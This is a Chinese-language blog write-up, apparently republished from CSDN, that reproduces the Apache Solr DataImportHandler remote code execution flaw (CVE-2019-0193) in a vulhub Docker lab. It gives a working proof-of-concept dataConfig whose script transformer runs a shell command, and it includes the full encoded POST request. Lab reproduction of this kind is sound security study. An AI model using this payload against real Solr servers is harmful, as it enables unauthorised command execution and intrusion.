当前位置:网站首页>Apache solr 远程代码执行漏洞(CVE-2019-0193)复现

Apache solr 远程代码执行漏洞(CVE-2019-0193)复现

2022-04-21 07:01:00 伟大灵魂导师

0x00:复现环境
靶机:CentOS7、docker、vulhub-master
攻击机:windows10
0x01:复现过程(数据包提交)
在/vulhub-master/solr/CVE-2019-0193/下启动镜像:

docker-compose up -d

然后攻击机访问靶机IP:8983(默认端口号)
如图访问成功:
在这里插入图片描述
随后运行命令:

docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db

攻击者需要知道Solr服务中Core的名称才能执行攻击。此命令其实本质上是向其加入test核心以便于测试
访问192.168.64.183:8983/solr/admin/cores查看Core的名称:
在这里插入图片描述
在打开刚刚创建好的test核心,选择Dataimport功能并选择debug模式,填入以下POC:

<dataConfig>
  <dataSource type="URLDataSource"/>
  <script><![CDATA[
          function poc(){
     java.lang.Runtime.getRuntime().exec("touch /tmp/success");
          }
  ]]></script>
  <document>
    <entity name="stackoverflow"
            url="https://stackoverflow.com/feeds/tag/solr"
            processor="XPathEntityProcessor"
            forEach="/feed"
            transformer="script:poc" />
  </document>
</dataConfig>

之后点击Execute with this Confuguration会发送以下请求包:

POST /solr/test/dataimport?_=1641970441677&indent=on&wt=json HTTP/1.1
Host: 192.168.64.183:8983
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 678
Origin: http://192.168.64.183:8983
Connection: close
Referer: http://192.168.64.183:8983/solr/
Cookie: JSESSIONID=189B4C0C2DD2FAA46730AB6F93F07A5C; AuthSession=dnVsaHViOjYxNjU0RDU0OuuRUpB6L4bS_rEsM06eIp94lu1K; ADMINCONSOLESESSION=RDQnhK7ZvvJvYZ971L8pbqHlFY8Ty7Hr2v3yLPgJsJtYL2jpSVTS!1280347726

command=full-import&verbose=false&clean=true&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22touch+%2Ftmp%2Fsuccess%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport

其实发送数据包访问的文件夹可以是**/solr/test/dataimport**,test为对应的Core名,而且GET方法也可以实现
在这里插入图片描述
在靶机执行docker-compose exec solr ls /tmp命令查看创建成功的success文件:
在这里插入图片描述

docker进入、退出容器命令

进入:
docker exec -it 容器ID /bin/bash
退出:
exit

参考链接:https://blog.csdn.net/whatday/article/details/106959989/

0x02:复现过程(端口监听)

                            等待补充…………

版权声明
本文为[伟大灵魂导师]所创,转载请带上原文链接,感谢
https://blog.csdn.net/weixin_42558965/article/details/122453157

边栏推荐

猜你喜欢

随机推荐